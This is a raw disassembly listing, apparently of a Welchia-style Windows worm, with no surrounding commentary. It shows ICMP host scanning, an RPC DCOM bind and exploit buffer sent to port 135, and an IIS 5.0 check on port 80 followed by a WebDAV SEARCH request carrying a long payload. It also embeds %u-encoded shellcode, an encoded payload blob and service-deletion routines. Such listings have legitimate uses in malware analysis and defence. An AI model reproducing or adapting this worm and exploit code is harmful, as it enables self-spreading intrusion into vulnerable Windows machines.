mov ecx, 41h
xor eax, eax
lea edi, [esp+110h+var_107]
mov [esp+110h+var_108], 0
rep stosd
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea eax, [esp+114h+var_108]
push offset aSMsblast_exe ; "%s\\msblast.exe"
push eax
call dword_40411C ; sprintf
add esp, 0Ch
lea ecx, [esp+110h+var_108]
push ecx
call dword_404074 ; GetFileAttributesA
pop edi
pop esi
test al, 1
jz short loc_402A91
and al, 0FEh
lea edx, [esp+108h+var_108]
push eax
push edx
call dword_404078 ; SetFileAttributesA
loc_402A91: ; CODE XREF: sub_402A00+81�j
lea eax, [esp+108h+var_108]
push eax
call dword_4040E8 ; DeleteFileA
add esp, 108h
retn
sub_402A00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AB0 proc near ; CODE XREF: sub_402B20+26�p
; sub_402C40+27�p
arg_0 = dword ptr 4
push esi
push edi
call sub_403122 ; IcmpCreateFile
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_402AC3
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402AC3: ; CODE XREF: sub_402AB0+C�j
push 5Ch
push 40h
call dword_404068 ; GlobalAlloc
mov esi, eax
test esi, esi
jnz short loc_402ADE
push edi
call sub_40311C ; IcmpCloseHandle
pop edi
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_402ADE: ; CODE XREF: sub_402AB0+21�j
mov eax, [esp+8+arg_0]
push ebx
push 7D0h
push 5Ch
push esi
push 0
push 40h
push offset dword_406430
push eax
push edi
mov dword ptr [esi+10h], offset dword_406430
mov word ptr [esi+0Ch], 40h
call sub_403116 ; IcmpSendEcho
push esi
mov ebx, eax
call dword_40406C ; GlobalFree
push edi
call sub_40311C ; IcmpCloseHandle
mov eax, ebx
pop ebx
pop edi
pop esi
retn
sub_402AB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402B20 proc near ; DATA XREF: sub_401470+F0�o
var_414 = word ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_3FC = byte ptr -3FCh
arg_0 = dword ptr 4
sub esp, 414h
push ebp
push esi
push offset dword_4075A4
call dword_404088 ; InterlockedIncrement
mov dword ptr [esp+41Ch+var_414], 0BB8h
mov ebp, [esp+41Ch+arg_0]
mov esi, [ebp+0]
push esi
call sub_402AB0
add esp, 4
test eax, eax
jz loc_402C17
push 87h
mov word ptr [esp+420h+var_410], 2
mov [esp+420h+var_40C], esi
call dword_404174 ; ntohs
push 0
push 1
push 2
mov word ptr [esp+428h+var_410+2], ax
call dword_404150 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_402C17
push ebx
push edi
lea eax, [esp+424h+var_410]
push 10h
push eax
push esi
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
mov ebx, dword_404168
push 0
push 48h
push offset dword_405434
push esi
call ebx ; dword_404168
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
lea ecx, [esp+420h+var_410]
push 4
push ecx
push 1006h
push 0FFFFh
push esi
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [esp+424h+var_3FC]
push 3E8h
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
test eax, eax
jz short loc_402C0E
mov eax, dword_406420
push 0
push eax
push offset dword_406470
push esi
call ebx ; dword_404168
cmp eax, 0FFFFFFFFh
jz short loc_402C0E
push 0
lea ecx, [esp+424h+var_3FC]
push 400h
push ecx
push esi
call edi ; dword_40416C
loc_402C0E: ; CODE XREF: sub_402B20+7B�j
; sub_402B20+92�j ...
push esi
call dword_404170 ; closesocket
pop edi
pop ebx
loc_402C17: ; CODE XREF: sub_402B20+30�j
; sub_402B20+62�j
test ebp, ebp
jz short loc_402C24
push ebp
call sub_402FC6
add esp, 4
loc_402C24: ; CODE XREF: sub_402B20+F9�j
push offset dword_4075A4
call dword_404064 ; InterlockedDecrement
pop esi
xor eax, eax
pop ebp
add esp, 414h
retn 4
sub_402B20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402C40 proc near ; DATA XREF: sub_401470+E1�o
var_5AC = word ptr -5ACh
var_5A8 = dword ptr -5A8h
var_5A4 = dword ptr -5A4h
var_594 = byte ptr -594h
var_574 = byte ptr -574h
var_2B8 = byte ptr -2B8h
arg_0 = dword ptr 4
sub esp, 5ACh
push ebx
push ebp
push esi
push edi
push offset dword_4075A4
call dword_404088 ; InterlockedIncrement
mov dword ptr [esp+5BCh+var_5AC], 0BB8h
mov eax, [esp+5BCh+arg_0]
mov esi, [eax]
push esi
call sub_402AB0
add esp, 4
test eax, eax
jz loc_402EC5
push 50h
mov word ptr [esp+5C0h+var_5A8], 2
mov [esp+5C0h+var_5A4], esi
call dword_404174 ; ntohs
push 0
push 1
push 2
mov word ptr [esp+5C8h+var_5A8+2], ax
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_402EC5
lea ecx, [esp+5BCh+var_5A8]
push 10h
push ecx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402EBE
push esi
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [esp+5B8h+var_594]
repne scasb
not ecx
sub edi, ecx
push offset aConnectionKeep ; "\r\nConnection: Keep-Alive\r\n\r\n"
mov eax, ecx
mov esi, edi
mov edi, edx
lea edx, [esp+5BCh+var_574]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+5BCh+var_594]
push ecx
push offset aGetHttp1_1Acce ; "GET / HTTP/1.1\r\nAccept: image/gif, imag"...
push offset aSSS ; "%s%s%s"
push edx
call dword_40411C ; sprintf
lea edi, [esp+5CCh+var_574]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 14h
repne scasb
not ecx
dec ecx
push 0
lea eax, [esp+5BCh+var_574]
push ecx
push eax
push ebp
call dword_404168 ; send
cmp eax, 0FFFFFFFFh
jz loc_402EBE
mov ebx, dword_404164
lea ecx, [esp+5B8h+var_5A8]
push 4
push ecx
push 1006h
push 0FFFFh
push ebp
call ebx ; dword_404164
push 0
lea edx, [esp+5BCh+var_2B8]
push 2BBh
push edx
push ebp
call dword_40416C ; recv
cmp eax, 0FFFFFFFFh
jz loc_402EBE
test eax, eax
jz loc_402EBE
mov [esp+eax+5B8h+var_2B8], 0
lea eax, [esp+5B8h+var_2B8]
push offset aServerMicrosof ; "Server: Microsoft-IIS/5.0"
push eax
call dword_404100 ; strstr
add esp, 8
test eax, eax
jz loc_402EBE
push ebp
call dword_404170 ; closesocket
mov esi, dword_4040C8
push 64h
call esi ; dword_4040C8
push 0
push 1
push 2
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_402EC5
lea ecx, [esp+5BCh+var_5A8]
push 10h
push ecx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz loc_402EBE
lea edx, [esp+5B8h+var_594]
lea eax, [esp+5B8h+var_574]
push edx
push offset aSearchHttp1_1H ; "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n"
push eax
call dword_40411C ; sprintf
lea edi, [esp+5C4h+var_574]
or ecx, 0FFFFFFFFh
xor eax, eax
add esp, 0Ch
repne scasb
not ecx
dec ecx
push 0
push ecx
lea ecx, [esp+5C0h+var_574]
push ecx
push ebp
call dword_404168 ; send
cmp eax, 0FFFFFFFFh
jz loc_402EBE
lea edx, [esp+5B8h+var_5A8]
push 4
push edx
push 1006h
push 0FFFFh
push ebp
call ebx ; dword_404164
push 0
lea eax, [esp+5BCh+var_2B8]
push 63h
push eax
push ebp
call dword_40416C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_402EBE
test eax, eax
jz short loc_402EBE
lea ecx, [esp+5B8h+var_2B8]
push offset a411 ; "411"
push ecx
mov [esp+eax+5C0h+var_2B8], 0
call dword_404100 ; strstr
add esp, 8
test eax, eax
jz short loc_402EBE
push ebp
call dword_404170 ; closesocket
push 64h
call esi ; dword_4040C8
push 0
push 1
push 2
call dword_404150 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz short loc_402EC5
lea edx, [esp+5BCh+var_5A8]
push 10h
push edx
push ebp
call dword_404154 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_402EBE
push 64h
call esi ; dword_4040C8
mov edx, ds:dword_4075A0
or ecx, 0FFFFFFFFh
mov edi, edx
xor eax, eax
repne scasb
not ecx
dec ecx
push ecx
push edx
push ebp
call sub_402F50
add esp, 0Ch
push 0BB8h
call esi ; dword_4040C8
loc_402EBE: ; CODE XREF: sub_402C40+77�j
; sub_402C40+E9�j ...
push ebp
call dword_404170 ; closesocket
loc_402EC5: ; CODE XREF: sub_402C40+31�j
; sub_402C40+60�j ...
mov eax, [esp+5BCh+arg_0]
pop edi
pop esi
pop ebp
test eax, eax
pop ebx
jz short loc_402EDD
push eax
call sub_402FC6
add esp, 4
loc_402EDD: ; CODE XREF: sub_402C40+292�j
push offset dword_4075A4
call dword_404064 ; InterlockedDecrement
xor eax, eax
add esp, 5ACh
retn 4
sub_402C40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F00 proc near ; CODE XREF: sub_401280+3C�p
; sub_401280+46�p
arg_0 = dword ptr 4
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov edi, eax
test edi, edi
jz short loc_402F4B
mov eax, [esp+8+arg_0]
push 0F01FFh
push eax
push edi
call dword_404038 ; OpenServiceA
mov esi, eax
test esi, esi
jnz short loc_402F38
push edi
call dword_404034 ; CloseServiceHandle
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_402F38: ; CODE XREF: sub_402F00+2C�j
push esi
call dword_40400C ; DeleteService
push esi
mov esi, dword_404034
call esi ; dword_404034
push edi
call esi ; dword_404034
loc_402F4B: ; CODE XREF: sub_402F00+15�j
pop edi
pop esi
retn
sub_402F00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402F50 proc near ; CODE XREF: sub_402C40+26F�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
push ebx
push ebp
push esi
push edi
mov edi, [esp+14h+arg_8]
xor ebx, ebx
cmp edi, ebx
mov [esp+14h+var_4], edi
mov [esp+14h+arg_8], ebx
jle short loc_402FA3
mov ebp, [esp+14h+arg_4]
loc_402F6B: ; CODE XREF: sub_402F50+51�j
mov ecx, [esp+14h+arg_0]
push 0
lea eax, [ebx+ebp]
push edi
push eax
push ecx
call dword_404168 ; send
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_402FAD
test esi, esi
jnz short loc_402F9B
cmp [esp+14h+arg_8], 64h
jge short loc_402FAD
push 5
call dword_4040C8 ; Sleep
inc [esp+14h+arg_8]
loc_402F9B: ; CODE XREF: sub_402F50+36�j
sub edi, esi
add ebx, esi
test edi, edi
jg short loc_402F6B
loc_402FA3: ; CODE XREF: sub_402F50+15�j
mov eax, [esp+14h+var_4]
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_402FAD: ; CODE XREF: sub_402F50+32�j
; sub_402F50+3D�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
pop ecx
retn
sub_402F50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FC0 proc near ; CODE XREF: sub_401280+8B�p
; sub_401470+9B�p ...
jmp dword_404108
sub_402FC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402FC6 proc near ; CODE XREF: sub_401C80+1EA�p
; sub_402B20+FC�p ...
jmp dword_404138
sub_402FC6 endp
; ---------------------------------------------------------------------------
loc_402FCC: ; CODE XREF: seg001:004091B8�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4041A8
push offset loc_403100
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp-18h], esp
and dword ptr [ebp-4], 0
push 1
call dword_404128 ; __set_app_type
pop ecx
or ds:dword_4076BC, 0FFFFFFFFh
or ds:dword_4076C0, 0FFFFFFFFh
call dword_404124 ; __p__fmode
mov ecx, ds:dword_4076B8
mov [eax], ecx
call dword_404118 ; __p__commode
mov ecx, ds:dword_4076B4
mov [eax], ecx
mov eax, dword_404114
mov eax, [eax]
mov ds:dword_4076C4, eax
call nullsub_1
cmp dword_406414, 0
jnz short loc_40304F
push offset sub_4030FA
call dword_404110 ; __setusermatherr
pop ecx
loc_40304F: ; CODE XREF: seg000:00403041�j
call sub_4030E8
push offset dword_40500C
push offset dword_405008
call sub_4030E2 ; _initterm
mov eax, ds:dword_4076B0
mov [ebp-28h], eax
lea eax, [ebp-28h]
push eax
push ds:dword_4076AC
lea eax, [ebp-20h]
push eax
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-1Ch]
push eax
call dword_4040F8 ; __getmainargs
push offset dword_405004
push offset dword_405000
call sub_4030E2 ; _initterm
call dword_40410C ; __p___initenv
mov ecx, [ebp-20h]
mov [eax], ecx
push dword ptr [ebp-20h]
push dword ptr [ebp-2Ch]
push dword ptr [ebp-1Ch]
call sub_4011C0
add esp, 30h
mov [ebp-24h], eax
push eax
call dword_4040F0 ; exit
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call sub_4030DC ; _XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-30h]
call dword_404134 ; _exit
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030DC proc near ; CODE XREF: seg000:004030C8�p
jmp dword_4040F4
sub_4030DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4030E2 proc near ; CODE XREF: seg000:0040305E�p
; seg000:00403091�p
jmp dword_4040FC
sub_4030E2 endp
; =============== S U B R O U T I N E =======================================
sub_4030E8 proc near ; CODE XREF: seg000:loc_40304F�p
push 30000h
push 10000h
call sub_403106 ; _controlfp
pop ecx
pop ecx
retn
sub_4030E8 endp
; =============== S U B R O U T I N E =======================================
sub_4030FA proc near ; DATA XREF: seg000:00403043�o
xor eax, eax
retn
sub_4030FA endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_403100: ; DATA XREF: seg000:00402FD6�o
jmp dword_40412C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403106 proc near ; CODE XREF: sub_4030E8+A�p
jmp dword_404130
sub_403106 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403110 proc near ; CODE XREF: sub_4016E0+10�p
jmp dword_40419C
sub_403110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403116 proc near ; CODE XREF: sub_402AB0+53�p
jmp dword_404058
sub_403116 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40311C proc near ; CODE XREF: sub_402AB0+24�p
; sub_402AB0+62�p
jmp dword_404050
sub_40311C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403122 proc near ; CODE XREF: sub_402AB0+2�p
jmp dword_404054
sub_403122 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403128 proc near ; CODE XREF: sub_401000+C0�p
jmp dword_4040DC
sub_403128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40312E proc near ; CODE XREF: sub_401000+7C�p
jmp dword_4040D8
sub_40312E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403134 proc near ; CODE XREF: sub_401000+62�p
jmp dword_4040D4
sub_403134 endp
; ---------------------------------------------------------------------------
align 4
dd 3B1h dup(0)
dword_404000 dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2Adword_404004 dd 77E377F9h ; resolved to->ADVAPI32.QueryServiceConfig2Adword_404008 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceAdword_40400C dd 77E37311h ; resolved to->ADVAPI32.DeleteServicedword_404010 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_404014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatusdword_404018 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_40401C dd 77DE5EB8h ; resolved to->ADVAPI32.QueryServiceStatus ; sub_402540+17A�r ...
dword_404020 dd 77DF5462h ; resolved to->ADVAPI32.QueryServiceConfigAdword_404024 dd 77E36CC9h ; resolved to->ADVAPI32.ChangeServiceConfigAdword_404028 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivilegesdword_40402C dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_402540+11�r ...
dword_404030 dd 77E37071h ; resolved to->ADVAPI32.CreateServiceAdword_404034 dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4023E0+11D�r ...
dword_404038 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_402540+60�r ...
dword_40403C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_404040 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_404044 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_404048 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueA align 10h
dword_404050 dd 76D64D33h ; resolved to->IPHLPAPI.IcmpCloseHandledword_404054 dd 76D64D5Eh ; resolved to->IPHLPAPI.IcmpCreateFiledword_404058 dd 76D64B79h ; resolved to->IPHLPAPI.IcmpSendEcho align 10h
dword_404060 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_404064 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_402C40+2A2�r
dword_404068 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_40406C dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFreedword_404070 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_404074 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_402A00+77�r
dword_404078 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_402A00+8B�r
dword_40407C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_404080 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_404084 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_404088 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_402C40+F�r
dword_40408C dd 7C80998Dh ; resolved to->KERNEL32.LocalAlloc ; sub_402540+7E�r
dword_404090 dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_402540+1CF�r
dword_404094 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_404098 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_40409C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4040A0 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4040A4 dd 7C80BF3Dh ; resolved to->KERNEL32.GetSystemDefaultLCIDdword_4040A8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_402970+A�r
dword_4040AC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_402A00+30�r
dword_4040B0 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4040B4 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_401660+42�r
dword_4040B8 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_4040BC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_401990+A1�r ...
dword_4040C0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_401B90+4C�r ...
dword_4040C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401470+F9�r ...
dword_4040C8 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401280+6C�r ...
dword_4040CC dd 7C87109Dh ; resolved to->KERNEL32.FreeConsoledword_4040D0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4040D4 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_4040D8 dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_4040DC dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_4040E0 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401000+E1�r ...
dword_4040E4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_4040E8 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_401780+1D3�r ...
align 10h
dword_4040F0 dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_4040F4 dd 77C32DAEh ; resolved to->MSVCRT._XcptFilterdword_4040F8 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargsdword_4040FC dd 77C39D67h ; resolved to->MSVCRT._inittermdword_404100 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_401B90+80�r ...
dword_404104 dd 77C371BCh ; resolved to->MSVCRT.sranddword_404108 dd 77C29CC5h dword_40410C dd 77C1F1F1h ; resolved to->MSVCRT.__p___initenvdword_404110 dd 77C4D675h ; resolved to->MSVCRT.__setusermatherrdword_404114 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_404118 dd 77C1F1A4h ; resolved to->MSVCRT.__p__commodedword_40411C dd 77C3F931h ; resolved to->MSVCRT.sprintf ; sub_4015E0+E�r ...
dword_404120 dd 77C47BE0h ; resolved to->MSVCRT.strrchrdword_404124 dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmodedword_404128 dd 77C3537Ch ; resolved to->MSVCRT.__set_app_typedword_40412C dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_404130 dd 77C4EE2Fh ; resolved to->MSVCRT._controlfpdword_404134 dd 77C39E9Ah ; resolved to->MSVCRT._exitdword_404138 dd 77C29CDDh dword_40413C dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_401280+12B�r ...
dword_404140 dd 77C4624Eh ; resolved to->MSVCRT._stricmp ; sub_4023E0+64�r
align 8
dword_404148 dd 7E45A045h ; resolved to->USER32.ExitWindowsEx align 10h
dword_404150 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_402B20+57�r ...
dword_404154 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_402C40+6E�r ...
dword_404158 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_40415C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_402C40+7E�r
dword_404160 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_401EA0+1B�r
dword_404164 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_401C80+41�r ...
dword_404168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401B90+1E�r ...
dword_40416C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_401B90+65�r ...
dword_404170 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_401990+15D�r ...
dword_404174 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4020E0+7�r ...
dword_404178 dd 71AB3E00h ; resolved to->WS2_32.binddword_40417C dd 71AB4428h ; resolved to->WS2_32.WSACleanupdword_404180 dd 71AB88D3h ; resolved to->WS2_32.listendword_404184 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_401990+137�r
dword_404188 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_401990+20�r
dword_40418C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_404190 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_404194 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4020E0+27�r ...
dd 0
dword_40419C dd 42D779A3h dd 2 dup(0)
dword_4041A8 dd 0FFFFFFFFh, 4030BCh, 4030D0h, 393h dup(0)dword_405000 dd 0 dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 aU5390U665eU66a db '%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f%u66ad%u4e3d%u740'
; DATA XREF: sub_401F30+A4�o
db '0%u9023%u612c%u5090%u6659%u90ad%u612c%u548d%u7088%u548d%u908a%u54'
db '8d%u708a%u548d%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3%u6'
db '099',0
align 4
aFfilomidomfafd db 'ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpai'
; DATA XREF: sub_401F30+C6�o
db 'nlnpeppppppgekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppilefpaid'
db 'oiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdne'
db 'oeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihfokppog'
db 'olpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoih'
db 'hppppppcececece',0
align 10h
aU5951U6858U759 db '%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759'
; DATA XREF: sub_401F30+45�o
db 'f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u68'
db '58%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018',0
align 4
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
word_40537C dw 3D30h ; DATA XREF: sub_401280+19D�r
dw 3D9Fh
dd 3D8B3D8Ah, 3D953D91h, 3D9D3D97h, 3DBC3DA1h, 3DE93DF3h
dd 0DCA03D9Ah, 0CA64CA60h, 0CA68CA67h, 0CA71CA66h, 0CB5DCA82h
dd 0CBD0CA62h, 0D20CCBCFh, 0D235D22Ah, 0D344D248h, 0D354D357h
dd 0D360D35Ch, 0D353D362h, 0D3A1D35Fh, 0D3A3D3A2h, 0D39CD390h
dd 0DA6DD39Eh, 0DA05DA04h, 0DA47DA11h, 0DA6ADA00h, 0DB91DAC7h
dd 0DA06DA08h, 0DA58DA3Fh, 0DA45DA59h, 0DA4BDA3Fh, 0DA68DA55h
dd 0DB8ADAC5h, 0DBEADBDEh, 0DCA0DC6Dh, 0DC75DCA3h, 0DCB9DCA2h
dd 0DC71DCBAh, 0DCA6DC70h
off_405414 dd offset aHttpDownload_m ; DATA XREF: sub_401780:loc_4018AF�r
; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_1 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_2 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_3 ; "http://download.microsoft.com/download/"...
off_405424 dd offset aHttpDownload_0 ; DATA XREF: sub_401780+120�r
; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_4 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_5 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_6 ; "http://download.microsoft.com/download/"...
dword_405434 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2
dword_40547C dd 3000005h, 10hdword_405484 dd 3E8h dd 0E5h, 3D0h, 40001h, 60005h, 1, 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
